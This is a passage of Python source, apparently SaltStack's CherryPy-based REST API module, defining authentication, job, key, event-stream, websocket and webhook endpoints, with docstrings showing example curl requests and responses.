yaml_processor, 'text/plain': text_processor, } # Do not process the body for POST requests that have specified no content # or have not specified Content-Length if (cherrypy.request.method.upper() == 'POST' and cherrypy.request.headers.get('Content-Length', '0') == '0'): cherrypy.request.process_request_body = False cherrypy.request.unserialized_data = None cherrypy.request.body.processors.clear() cherrypy.request.body.default_proc = cherrypy.HTTPError( 406, 'Content type not supported') cherrypy.request.body.processors = ct_in_map def lowdata_fmt(): ''' Validate and format lowdata from incoming unserialized request data This tool requires that the hypermedia_in tool has already been run. ''' if cherrypy.request.method.upper() != 'POST': return data = cherrypy.request.unserialized_data # if the data was sent as urlencoded, we need to make it a list. # this is a very forgiving implementation as different clients set different # headers for form encoded data (including charset or something similar) if not isinstance(data, list): # Make the 'arg' param a list if not already if 'arg' in data and not isinstance(data['arg'], list): data['arg'] = [data['arg']] # Finally, make a Low State and put it in request cherrypy.request.lowstate = [data] else: cherrypy.serving.request.lowstate = data cherrypy.tools.html_override = cherrypy.Tool('on_start_resource', html_override_tool, priority=53) cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource', salt_token_tool, priority=55) cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body', salt_auth_tool, priority=60) cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body', hypermedia_in) cherrypy.tools.cors_tool = cherrypy.Tool('before_handler', cors_tool, priority=30) cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler', lowdata_fmt, priority=40) cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler', hypermedia_out) cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler', salt_ip_verify_tool) ############################################################################### class LowDataAdapter(object): ''' The primary entry point to Salt's REST API ''' exposed = True _cp_config = { 'tools.sessions.on': True, 'tools.sessions.timeout': 60 * 10, # 10 hours # 'tools.autovary.on': True, 'tools.hypermedia_out.on': True, 'tools.hypermedia_in.on': True, 'tools.lowdata_fmt.on': True, 'tools.salt_ip_verify.on': True, } def __init__(self): self.opts = cherrypy.config['saltopts'] self.api = salt.netapi.NetapiClient(self.opts) def exec_lowstate(self, client=None, token=None): ''' Pull a Low State data structure from request and execute the low-data chunks through Salt. The low-data chunks will be updated to include the authorization token for the current session. ''' lowstate = cherrypy.request.lowstate # Release the session lock before executing any potentially # long-running Salt commands. This allows different threads to execute # Salt commands concurrently without blocking. if cherrypy.request.config.get('tools.sessions.on', False): cherrypy.session.release_lock() # if the lowstate loaded isn't a list, lets notify the client if not isinstance(lowstate, list): raise cherrypy.HTTPError(400, 'Lowstates must be a list') # Make any requested additions or modifications to each lowstate, then # execute each one and yield the result. for chunk in lowstate: if token: chunk['token'] = token if client: chunk['client'] = client # Make any 'arg' params a list if not already. # This is largely to fix a deficiency in the urlencoded format. if 'arg' in chunk and not isinstance(chunk['arg'], list): chunk['arg'] = [chunk['arg']] ret = self.api.run(chunk) # Sometimes Salt gives us a return and sometimes an iterator if isinstance(ret, collections.Iterator): for i in ret: yield i else: yield ret def GET(self): ''' An explanation of the API with links of where to go next .. http:get:: / :reqheader Accept: |req_accept| :status 200: |200| :status 401: |401| :status 406: |406| **Example request:** .. code-block:: bash curl -i localhost:8000 .. code-block:: http GET / HTTP/1.1 Host: localhost:8000 Accept: application/json **Example response:** .. code-block:: http HTTP/1.1 200 OK Content-Type: application/json ''' import inspect # Grab all available client interfaces clients = [name for name, _ in inspect.getmembers(salt.netapi.NetapiClient, predicate=inspect.ismethod) if not name.startswith('__')] clients.remove('run') # run method calls client interfaces return { 'return': "Welcome", 'clients': clients, } @cherrypy.tools.salt_token() @cherrypy.tools.salt_auth() def POST(self, **kwargs): ''' Send one or more Salt commands in the request body .. http:post:: / :reqheader X-Auth-Token: |req_token| :reqheader Accept: |req_accept| :reqheader Content-Type: |req_ct| :resheader Content-Type: |res_ct| :status 200: |200| :status 401: |401| :status 406: |406| :term:`lowstate` data describing Salt commands must be sent in the request body. **Example request:** .. code-block:: bash curl -sSik https://localhost:8000 \\ -H "Accept: application/x-yaml" \\ -H "X-Auth-Token: d40d1e1e<...snip...>" \\ -d client=local \\ -d tgt='*' \\ -d fun='test.ping' \\ .. code-block:: http POST / HTTP/1.1 Host: localhost:8000 Accept: application/x-yaml X-Auth-Token: d40d1e1e Content-Length: 36 Content-Type: application/x-www-form-urlencoded fun=test.ping&client=local&tgt=* **Example response:** .. code-block:: http HTTP/1.1 200 OK Content-Length: 200 Allow: GET, HEAD, POST Content-Type: application/x-yaml return: - ms-0: true ms-1: true ms-2: true ms-3: true ms-4: true **Other examples**: .. code-block:: bash # Sending multiple positional args with urlencoded: curl -sSik https://localhost:8000 \\ -d client=local \\ -d tgt='*' \\ -d fun='cmd.run' \\ -d arg='du -sh .' \\ -d arg='/path/to/dir' # Sending posiitonal args and Keyword args with JSON: echo '[ { "client": "local", "tgt": "*", "fun": "cmd.run", "arg": [ "du -sh .", "/path/to/dir" ], "kwarg": { "shell": "/bin/sh", "template": "jinja" } } ]' | curl -sSik https://localhost:8000 \\ -H 'Content-type: application/json' \\ -d@- # Calling runner functions: curl -sSik https://localhost:8000 \\ -d client=runner \\ -d fun='jobs.lookup_jid' \\ -d jid='20150129182456704682' \\ -d outputter=highstate # Calling wheel functions: curl -sSik https://localhost:8000 \\ -d client=wheel \\ -d fun='key.gen_accept' \\ -d id_=dave \\ -d keysize=4096 ''' return { 'return': list(self.exec_lowstate( token=cherrypy.session.get('token'))) } class Minions(LowDataAdapter): ''' Convenience URLs for working with minions ''' _cp_config = dict(LowDataAdapter._cp_config, **{ 'tools.salt_token.on': True, 'tools.salt_auth.on': True, }) def GET(self, mid=None): ''' A convenience URL for getting lists of minions or getting minion details .. http:get:: /minions/(mid) :reqheader X-Auth-Token: |req_token| :reqheader Accept: |req_accept| :status 200: |200| :status 401: |401| :status 406: |406| **Example request:** .. code-block:: bash curl -i localhost:8000/minions/ms-3 .. code-block:: http GET /minions/ms-3 HTTP/1.1 Host: localhost:8000 Accept: application/x-yaml **Example response:** .. code-block:: http HTTP/1.1 200 OK Content-Length: 129005 Content-Type: application/x-yaml return: - ms-3: grains.items: ... ''' cherrypy.request.lowstate = [{ 'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items', }] return { 'return': list(self.exec_lowstate( token=cherrypy.session.get('token'))), } def POST(self, **kwargs): ''' Start an execution command and immediately return the job id .. http:post:: /minions :reqheader X-Auth-Token: |req_token| :reqheader Accept: |req_accept| :reqheader Content-Type: |req_ct| :resheader Content-Type: |res_ct| :status 200: |200| :status 401: |401| :status 406: |406| :term:`lowstate` data describing Salt commands must be sent in the request body. The ``client`` option will be set to :py:meth:`~salt.client.LocalClient.local_async`. **Example request:** .. code-block:: bash curl -sSi localhost:8000/minions \\ -H "Accept: application/x-yaml" \\ -d tgt='*' \\ -d fun='status.diskusage' .. code-block:: http POST /minions HTTP/1.1 Host: localhost:8000 Accept: application/x-yaml Content-Length: 26 Content-Type: application/x-www-form-urlencoded tgt=*&fun=status.diskusage **Example response:** .. code-block:: http HTTP/1.1 202 Accepted Content-Length: 86 Content-Type: application/x-yaml return: - jid: '20130603122505459265' minions: [ms-4, ms-3, ms-2, ms-1, ms-0] _links: jobs: - href: /jobs/20130603122505459265 ''' job_data = list(self.exec_lowstate(client='local_async', token=cherrypy.session.get('token'))) cherrypy.response.status = 202 return { 'return': job_data, '_links': { 'jobs': [{'href': '/jobs/{0}'.format(i['jid'])} for i in job_data if i], }, } class Jobs(LowDataAdapter): _cp_config = dict(LowDataAdapter._cp_config, **{ 'tools.salt_token.on': True, 'tools.salt_auth.on': True, }) def GET(self, jid=None, timeout=''): ''' A convenience URL for getting lists of previously run jobs or getting the return from a single job .. http:get:: /jobs/(jid) List jobs or show a single job from the job cache. :status 200: |200| :status 401: |401| :status 406: |406| **Example request:** .. code-block:: bash curl -i localhost:8000/jobs .. code-block:: http GET /jobs HTTP/1.1 Host: localhost:8000 Accept: application/x-yaml **Example response:** .. code-block:: http HTTP/1.1 200 OK Content-Length: 165 Content-Type: application/x-yaml return: - '20121130104633606931': Arguments: - '3' Function: test.fib Start Time: 2012, Nov 30 10:46:33.606931 Target: jerry Target-type: glob **Example request:** .. code-block:: bash curl -i localhost:8000/jobs/20121130104633606931 .. code-block:: http GET /jobs/20121130104633606931 HTTP/1.1 Host: localhost:8000 Accept: application/x-yaml **Example response:** .. code-block:: http HTTP/1.1 200 OK Content-Length: 73 Content-Type: application/x-yaml info: - Arguments: - '3' Function: test.fib Minions: - jerry Start Time: 2012, Nov 30 10:46:33.606931 Target: '*' Target-type: glob User: saltdev jid: '20121130104633606931' return: - jerry: - - 0 - 1 - 1 - 2 - 6.9141387939453125e-06 ''' lowstate = [{ 'client': 'runner', 'fun': 'jobs.lookup_jid' if jid else 'jobs.list_jobs', 'jid': jid, }] if jid: lowstate.append({ 'client': 'runner', 'fun': 'jobs.list_job', 'jid': jid, }) cherrypy.request.lowstate = lowstate job_ret_info = list(self.exec_lowstate( token=cherrypy.session.get('token'))) ret = {} if jid: job_ret, job_info = job_ret_info ret['info'] = [job_info] else: job_ret = job_ret_info[0] ret['return'] = [job_ret] return ret class Keys(LowDataAdapter): ''' Convenience URLs for working with minion keys .. versionadded:: 2014.7.0 These URLs wrap the functionality provided by the :py:mod:`key wheel module <salt.wheel.key>` functions. ''' def GET(self, mid=None): ''' Show the list of minion keys or detail on a specific key .. versionadded:: 2014.7.0 .. http:get:: /keys/(mid) List all keys or show a specific key :status 200: |200| :status 401: |401| :status 406: |406| **Example request:** .. code-block:: bash curl -i localhost:8000/keys .. code-block:: http GET /keys HTTP/1.1 Host: localhost:8000 Accept: application/x-yaml **Example response:** .. code-block:: http HTTP/1.1 200 OK Content-Length: 165 Content-Type: application/x-yaml return: local: - master.pem - master.pub minions: - jerry minions_pre: [] minions_rejected: [] **Example request:** .. code-block:: bash curl -i localhost:8000/keys/jerry .. code-block:: http GET /keys/jerry HTTP/1.1 Host: localhost:8000 Accept: application/x-yaml **Example response:** .. code-block:: http HTTP/1.1 200 OK Content-Length: 73 Content-Type: application/x-yaml return: minions: jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b ''' self._cp_config['tools.salt_token.on'] = True if mid: lowstate = [{ 'client': 'wheel', 'fun': 'key.finger', 'match': mid, }] else: lowstate = [{ 'client': 'wheel', 'fun': 'key.list_all', }] cherrypy.request.lowstate = lowstate result = self.exec_lowstate(token=cherrypy.session.get('token')) return {'return': next(result, {}).get('data', {}).get('return', {})} def POST(self, mid, keysize=None, force=None, **kwargs): r''' Easily generate keys for a minion and auto-accept the new key .. versionadded:: 2014.7.0 Example partial kickstart script to bootstrap a new minion: .. code-block:: text %post mkdir -p /etc/salt/pki/minion curl -sSk https://localhost:8000/keys \ -d mid=jerry \ -d username=kickstart \ -d password=kickstart \ -d eauth=pam \ | tar -C /etc/salt/pki/minion -xf - mkdir -p /etc/salt/minion.d printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf %end .. http:post:: /keys Generate a public and private key and return both as a tarball Authentication credentials must be passed in the request. :status 200: |200| :status 401: |401| :status 406: |406| **Example request:** .. code-block:: bash curl -sSk https://localhost:8000/keys \ -d mid=jerry \ -d username=kickstart \ -d password=kickstart \ -d eauth=pam \ -o jerry-salt-keys.tar .. code-block:: http POST /keys HTTP/1.1 Host: localhost:8000 **Example response:** .. code-block:: http HTTP/1.1 200 OK Content-Length: 10240 Content-Disposition: attachment; filename="saltkeys-jerry.tar" Content-Type: application/x-tar jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000 ''' self._cp_config['tools.hypermedia_out.on'] = False self._cp_config['tools.sessions.on'] = False lowstate = [{ 'client': 'wheel', 'fun': 'key.gen_accept', 'id_': mid, }] if keysize: lowstate[0]['keysize'] = keysize if force: lowstate[0]['force'] = force lowstate[0].update(kwargs) cherrypy.request.lowstate = lowstate result = self.exec_lowstate() ret = next(result, {}).get('data', {}).get('return', {}) pub_key = ret.get('pub', '') pub_key_file = tarfile.TarInfo('minion.pub') pub_key_file.size = len(pub_key) priv_key = ret.get('priv', '') priv_key_file = tarfile.TarInfo('minion.pem') priv_key_file.size = len(priv_key) fileobj = StringIO.StringIO() tarball = tarfile.open(fileobj=fileobj, mode='w') tarball.addfile(pub_key_file, StringIO.StringIO(pub_key)) tarball.addfile(priv_key_file, StringIO.StringIO(priv_key)) tarball.close() headers = cherrypy.response.headers headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(mid) headers['Content-Type'] = 'application/x-tar' headers['Content-Length'] = fileobj.len headers['Cache-Control'] = 'no-cache' fileobj.seek(0) return fileobj class Login(LowDataAdapter): ''' Log in to receive a session token :ref:`Authentication information <rest_cherrypy-auth>`. ''' def __init__(self, *args, **kwargs): super(Login, self).__init__(*args, **kwargs) self.auth = salt.auth.Resolver(self.opts) def GET(self): ''' Present the login interface .. http:get:: /login An explanation of how to log in. :status 200: |200| :status 401: |401| :status 406: |406| **Example request:** .. code-block:: bash curl -i localhost:8000/login .. code-block:: http GET /login HTTP/1.1 Host: localhost:8000 Accept: text/html **Example response:** .. code-block:: http HTTP/1.1 200 OK Content-Type: text/html ''' cherrypy.response.headers['WWW-Authenticate'] = 'Session' return { 'status': cherrypy.response.status, 'return': "Please log in", } def POST(self, **kwargs): ''' :ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system .. http:post:: /login :reqheader X-Auth-Token: |req_token| :reqheader Accept: |req_accept| :reqheader Content-Type: |req_ct| :form eauth: the eauth backend configured for the user :form username: username :form password: password :status 200: |200| :status 401: |401| :status 406: |406| **Example request:** .. code-block:: bash curl -si localhost:8000/login \\ -H "Accept: application/json" \\ -d username='saltuser' \\ -d password='saltpass' \\ -d eauth='pam' .. code-block:: http POST / HTTP/1.1 Host: localhost:8000 Content-Length: 42 Content-Type: application/x-www-form-urlencoded Accept: application/json username=saltuser&password=saltpass&eauth=pam **Example response:** .. code-block:: http HTTP/1.1 200 OK Content-Type: application/json Content-Length: 206 X-Auth-Token: 6d1b722e Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/ {"return": { "token": "6d1b722e", "start": 1363805943.776223, "expire": 1363849143.776224, "user": "saltuser", "eauth": "pam", "perms": [ "grains.*", "status.*", "sys.*", "test.*" ] }} ''' if not self.api._is_master_running(): raise salt.exceptions.SaltDaemonNotRunning( 'Salt Master is not available.') # the urlencoded_processor will wrap this in a list if isinstance(cherrypy.serving.request.lowstate, list): creds = cherrypy.serving.request.lowstate[0] else: creds = cherrypy.serving.request.lowstate token = self.auth.mk_token(creds) if 'token' not in token: raise cherrypy.HTTPError(401, 'Could not authenticate using provided credentials') cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id cherrypy.session['token'] = token['token'] cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60 # Grab eauth config for the current backend for the current user try: eauth = self.opts.get('external_auth', {}).get(token['eauth'], {}) if 'groups' in token: user_groups = set(token['groups']) eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')]) perms = [] for group in user_groups & eauth_groups: perms.extend(eauth['{0}%'.format(group)]) perms = perms or None else: perms = eauth.get(token['name'], eauth.get('*')) if perms is None: raise ValueError("Eauth permission list not found.") except (AttributeError, IndexError, KeyError, ValueError): logger.debug("Configuration for external_auth malformed for " "eauth '{0}', and user '{1}'." .format(token.get('eauth'), token.get('name')), exc_info=True) raise cherrypy.HTTPError(500, 'Configuration for external_auth could not be read.') return {'return': [{ 'token': cherrypy.session.id, 'expire': token['expire'], 'start': token['start'], 'user': token['name'], 'eauth': token['eauth'], 'perms': perms, }]} class Logout(LowDataAdapter): ''' Class to remove or invalidate sessions ''' _cp_config = dict(LowDataAdapter._cp_config, **{ 'tools.salt_token.on': True, 'tools.salt_auth.on': True, 'tools.lowdata_fmt.on': False, }) def POST(self): ''' Destroy the currently active session and expire the session cookie ''' cherrypy.lib.sessions.expire() # set client-side to expire cherrypy.session.regenerate() # replace server-side with new return {'return': "Your token has been cleared"} class Run(LowDataAdapter): ''' Class to run commands without normal session handling ''' _cp_config = dict(LowDataAdapter._cp_config, **{ 'tools.sessions.on': False, }) def POST(self, **kwargs): ''' Run commands bypassing the :ref:`normal session handling <rest_cherrypy-auth>` .. http:post:: /run This entry point is primarily for "one-off" commands. Each request must pass full Salt authentication credentials. Otherwise this URL is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`. :term:`lowstate` data describing Salt commands must be sent in the request body. :status 200: |200| :status 401: |401| :status 406: |406| **Example request:** .. code-block:: bash curl -sS localhost:8000/run \\ -H 'Accept: application/x-yaml' \\ -d client='local' \\ -d tgt='*' \\ -d fun='test.ping' \\ -d username='saltdev' \\ -d password='saltdev' \\ -d eauth='pam' .. code-block:: http POST /run HTTP/1.1 Host: localhost:8000 Accept: application/x-yaml Content-Length: 75 Content-Type: application/x-www-form-urlencoded client=local&tgt=*&fun=test.ping&username=saltdev&password=saltdev&eauth=pam **Example response:** .. code-block:: http HTTP/1.1 200 OK Content-Length: 73 Content-Type: application/x-yaml return: - ms-0: true ms-1: true ms-2: true ms-3: true ms-4: true The /run enpoint can also be used to issue commands using the salt-ssh subsystem. When using salt-ssh, eauth credentials should not be supplied. Instad, authentication should be handled by the SSH layer itself. The use of the salt-ssh client does not require a salt master to be running. Instead, only a roster file must be present in the salt configuration directory. All SSH client requests are synchronous. ** Example SSH client request:** .. code-block:: bash curl -sS localhost:8000/run \\ -H 'Accept: application/x-yaml' \\ -d client='ssh' \\ -d tgt='*' \\ -d fun='test.ping' .. code-block:: http POST /run HTTP/1.1 Host: localhost:8000 Accept: application/x-yaml Content-Length: 75 Content-Type: application/x-www-form-urlencoded client=ssh&tgt=*&fun=test.ping **Example SSH response:** .. code-block:: http return: - silver: fun: test.ping fun_args: [] id: silver jid: '20141203103525666185' retcode: 0 return: true success: true ''' return { 'return': list(self.exec_lowstate()), } class Events(object): ''' Expose the Salt event bus The event bus on the Salt master exposes a large variety of things, notably when executions are started on the master and also when minions ultimately return their results. This URL provides a real-time window into a running Salt infrastructure. .. seealso:: :ref:`events` ''' exposed = True _cp_config = dict(LowDataAdapter._cp_config, **{ 'response.stream': True, 'tools.encode.encoding': 'utf-8', # Auth handled manually below 'tools.salt_token.on': True, 'tools.salt_auth.on': False, 'tools.hypermedia_in.on': False, 'tools.hypermedia_out.on': False, }) def __init__(self): self.opts = cherrypy.config['saltopts'] self.resolver = salt.auth.Resolver(self.opts) def _is_valid_token(self, auth_token): ''' Check if this is a valid salt-api token or valid Salt token salt-api tokens are regular session tokens that tie back to a real Salt token. Salt tokens are tokens generated by Salt's eauth system. :return bool: True if valid, False if not valid. ''' if auth_token is None: return False # First check if the given token is in our session table; if so it's a # salt-api token and we need to get the Salt token from there. orig_sesion, _ = cherrypy.session.cache.get(auth_token, ({}, None)) # If it's not in the session table, assume it's a regular Salt token. salt_token = orig_sesion.get('token', auth_token) # The eauth system does not currently support perms for the event # stream, so we're just checking if the token exists not if the token # allows access. if salt_token and self.resolver.get_token(salt_token): return True return False def GET(self, token=None, salt_token=None): r''' An HTTP stream of the Salt master event bus This stream is formatted per the Server Sent Events (SSE) spec. Each event is formatted as JSON. .. http:get:: /events :status 200: |200| :status 401: |401| :status 406: |406| :query token: **optional** parameter containing the token ordinarily supplied via the X-Auth-Token header in order to allow cross-domain requests in browsers that do not include CORS support in the EventSource API. E.g., ``curl -NsS localhost:8000/events?token=308650d`` :query salt_token: **optional** parameter containing a raw Salt *eauth token* (not to be confused with the token returned from the /login URL). E.g., ``curl -NsS localhost:8000/events?salt_token=30742765`` **Example request:** .. code-block:: bash curl -NsS localhost:8000/events .. code-block:: http GET /events HTTP/1.1 Host: localhost:8000 **Example response:** Note, the ``tag`` field is not part of the spec. SSE compliant clients should ignore unknown fields. This addition allows non-compliant clients to only watch for certain tags without having to deserialze the JSON object each time. .. code-block:: http HTTP/1.1 200 OK Connection: keep-alive Cache-Control: no-cache Content-Type: text/event-stream;charset=utf-8 retry: 400 tag: salt/job/20130802115730568475/new data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}} tag: salt/job/20130802115730568475/ret/jerry data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}} The event stream can be easily consumed via JavaScript: .. code-block:: javascript var source = new EventSource('/events'); source.onopen = function() { console.debug('opening') }; source.onerror = function(e) { console.debug('error!', e) }; source.onmessage = function(e) { console.debug('Tag: ', e.data.tag) console.debug('Data: ', e.data.data) }; Or using CORS: .. code-block:: javascript var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true}); It is also possible to consume the stream via the shell. Records are separated by blank lines; the ``data:`` and ``tag:`` prefixes will need to be removed manually before attempting to unserialize the JSON. curl's ``-N`` flag turns off input buffering which is required to process the stream incrementally. Here is a basic example of printing each event as it comes in: .. code-block:: bash curl -NsS localhost:8000/events |\ while IFS= read -r line ; do echo $line done Here is an example of using awk to filter events based on tag: .. code-block:: bash curl -NsS localhost:8000/events |\ awk ' BEGIN { RS=""; FS="\\n" } $1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 } ' tag: salt/job/20140112010149808995/new data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}} tag: 20140112010149808995 data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}} ''' cookies = cherrypy.request.cookie auth_token = token or salt_token or ( cookies['session_id'].value if 'session_id' in cookies else None) if not self._is_valid_token(auth_token): raise cherrypy.HTTPError(401) # Release the session lock before starting the long-running response cherrypy.session.release_lock() cherrypy.response.headers['Content-Type'] = 'text/event-stream' cherrypy.response.headers['Cache-Control'] = 'no-cache' cherrypy.response.headers['Connection'] = 'keep-alive' def listen(): ''' An iterator to yield Salt events ''' event = salt.utils.event.get_event( 'master', sock_dir=self.opts['sock_dir'], transport=self.opts['transport'], opts=self.opts) stream = event.iter_events(full=True) yield u'retry: {0}\n'.format(400) while True: data = next(stream) yield u'tag: {0}\n'.format(data.get('tag', '')) yield u'data: {0}\n\n'.format(json.dumps(data)) return listen() class WebsocketEndpoint(object): ''' Open a WebSocket connection to Salt's event bus The event bus on the Salt master exposes a large variety of things, notably when executions are started on the master and also when minions ultimately return their results. This URL provides a real-time window into a running Salt infrastructure. Uses websocket as the transport mechanism. .. seealso:: :ref:`events` ''' exposed = True _cp_config = dict(LowDataAdapter._cp_config, **{ 'response.stream': True, 'tools.encode.encoding': 'utf-8', # Auth handled manually below 'tools.salt_token.on': True, 'tools.salt_auth.on': False, 'tools.hypermedia_in.on': False, 'tools.hypermedia_out.on': False, 'tools.websocket.on': True, 'tools.websocket.handler_cls': websockets.SynchronizingWebsocket, }) def __init__(self): self.opts = cherrypy.config['saltopts'] self.auth = salt.auth.LoadAuth(self.opts) def GET(self, token=None, **kwargs): ''' Return a websocket connection of Salt's event stream .. http:get:: /ws/(token) :query format_events: The event stream will undergo server-side formatting if the ``format_events`` URL parameter is included in the request. This can be useful to avoid formatting on the client-side: .. code-block:: bash curl -NsS <...snip...> localhost:8000/ws?format_events :reqheader X-Auth-Token: an authentication token from :py:class:`~Login`. :status 101: switching to the websockets protocol :status 401: |401| :status 406: |406| **Example request:** curl -NsSk \\ -H 'X-Auth-Token: ffedf49d' \\ -H 'Host: localhost:8000' \\ -H 'Connection: Upgrade' \\ -H 'Upgrade: websocket' \\ -H 'Origin: https://localhost:8000' \\ -H 'Sec-WebSocket-Version: 13' \\ -H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\ localhost:8000/ws .. code-block:: http GET /ws HTTP/1.1 Connection: Upgrade Upgrade: websocket Host: localhost:8000 Origin: https://localhost:8000 Sec-WebSocket-Version: 13 Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA== X-Auth-Token: ffedf49d **Example response**: .. code-block:: http HTTP/1.1 101 Switching Protocols Upgrade: websocket Connection: Upgrade Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE= Sec-WebSocket-Version: 13 An authentication token **may optionally** be passed as part of the URL for browsers that cannot be configured to send the authentication header or cookie: .. code-block:: bash curl -NsS <...snip...> localhost:8000/ws/ffedf49d The event stream can be easily consumed via JavaScript: .. code-block:: javascript // Note, you must be authenticated! var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a'); source.onerror = function(e) { console.debug('error!', e); }; source.onmessage = function(e) { console.debug(e.data); }; source.send('websocket client ready') source.close(); Or via Python, using the Python module `websocket-client <https://pypi.python.org/pypi/websocket-client/>`_ for example. .. code-block:: python # Note, you must be authenticated! from websocket import create_connection ws = create_connection('ws://localhost:8000/ws/d0ce6c1a') ws.send('websocket client ready') # Look at https://pypi.python.org/pypi/websocket-client/ for more # examples. while listening_to_events: print ws.recv() ws.close() Above examples show how to establish a websocket connection to Salt and activating real time updates from Salt's event stream by signaling ``websocket client ready``. ''' # Pulling the session token from an URL param is a workaround for # browsers not supporting CORS in the EventSource API. if token: orig_sesion, _ = cherrypy.session.cache.get(token, ({}, None)) salt_token = orig_sesion.get('token') else: salt_token = cherrypy.session.get('token') # Manually verify the token if not salt_token or not self.auth.get_tok(salt_token): raise cherrypy.HTTPError(401) # Release the session lock before starting the long-running response cherrypy.session.release_lock() # A handler is the server side end of the websocket connection. Each # request spawns a new instance of this handler handler = cherrypy.request.ws_handler def event_stream(handler, pipe): ''' An iterator to return Salt events (and optionally format them) ''' # blocks until send is called on the parent end of this pipe. pipe.recv() event = salt.utils.event.get_event( 'master', sock_dir=self.opts['sock_dir'], transport=self.opts['transport'], opts=self.opts) stream = event.iter_events(full=True) SaltInfo = event_processor.SaltInfo(handler) while True: data = next(stream) if data: try: # work around try to decode catch unicode errors if 'format_events' in kwargs: SaltInfo.process(data, salt_token, self.opts) else: handler.send('data: {0}\n\n'.format( json.dumps(data)), False) except UnicodeDecodeError: logger.error( "Error: Salt event has non UTF-8 data:\n{0}" .format(data)) time.sleep(0.1) parent_pipe, child_pipe = Pipe() handler.pipe = parent_pipe handler.opts = self.opts # Process to handle async push to a client. # Each GET request causes a process to be kicked off. proc = Process(target=event_stream, args=(handler, child_pipe)) proc.start() class Webhook(object): ''' A generic web hook entry point that fires an event on Salt's event bus External services can POST data to this URL to trigger an event in Salt. For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks. .. note:: Be mindful of security Salt's Reactor can run any code. A Reactor SLS that responds to a hook event is responsible for validating that the event came from a trusted source and contains valid data. **This is a generic interface and securing it is up to you!** This URL requires authentication however not all external services can be configured to authenticate. For this reason authentication can be selectively disabled for this URL. Follow best practices -- always use SSL, pass a secret key, configure the firewall to only allow traffic from a known source, etc. The event data is taken from the request body. The :mailheader:`Content-Type` header is respected for the payload. The event tag is prefixed with ``salt/netapi/hook`` and the URL path is appended to the end. For example, a ``POST`` request sent to ``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag ``salt/netapi/hook/mycompany/myapp/mydata``. The following is an example ``.travis.yml`` file to send notifications to Salt of successful test runs: .. code-block:: yaml language: python script: python -m unittest tests after_success: - | curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \ -d branch="${TRAVIS_BRANCH}" \ -d commit="${TRAVIS_COMMIT}" .. seealso:: :ref:`events`, :ref:`reactor` ''' exposed = True tag_base = ['salt', 'netapi', 'hook'] _cp_config = dict(LowDataAdapter._cp_config, **{ # Don't do any lowdata processing on the POST data 'tools.lowdata_fmt.on': True, # Auth can be overridden in __init__(). 'tools.salt_token.on': True, 'tools.salt_auth.on': True, }) def __init__(self): self.opts = cherrypy.config['saltopts'] self.event = salt.utils.event.get_event( 'master', sock_dir=self.opts['sock_dir'], transport=self.opts['transport'], opts=self.opts, listen=False) if cherrypy.config['apiopts'].get('webhook_disable_auth'): self._cp_config['tools.salt_token.on'] = False self._cp_config['tools.salt_auth.on'] = False def POST(self, *args, **kwargs): ''' Fire an event in Salt with a custom event tag and data .. http:post:: /hook :status 200: |200| :status 401: |401| :status 406: |406| :status 413: request body is too large **Example request:** .. code-block:: bash curl -sS localhost:8000/hook -d foo='Foo!' -d bar='Bar!' .. code-block:: http POST /hook HTTP/1.1 Host: localhost:8000 Content-Length: 16 Content-Type: application/x-www-form-urlencoded foo=Foo&bar=Bar! **Example response**: .. code-block:: http HTTP/1.1 200 OK Content-Length: 14 Content-Type: application/json {"success": true} As a practical example, an internal continuous-integration build server could send an HTTP POST request to the URL ``https://localhost:8000/hook/mycompany/build/success`` which contains the result of a build and the SHA of the version that was built as JSON. That would then produce the following event in Salt that could be used to kick off a deployment via Salt's Reactor:: Event fired at Fri Feb 14 17:40:11 2014 ************************* Tag: salt/netapi/hook/mycompany/build/success Data: {'_stamp': '2014-02-14_17:40:11.440996', 'headers': { 'X-My-Secret-Key': 'F0fAgoQjIT@W', 'Content-Length': '37', 'Content-Type': 'application/json', 'Host': 'localhost:8000', 'Remote-Addr': '127.0.0.1'}, 'post': {'revision': 'aa22a3c4b2e7', 'result': True}} Salt's Reactor could listen for the event: .. code-block:: yaml reactor: - 'salt/netapi/hook/mycompany/build/*': - /srv/reactor/react_ci_builds.sls And finally deploy the new build: .. code-block:: yaml {% set secret_key = data.get('headers', 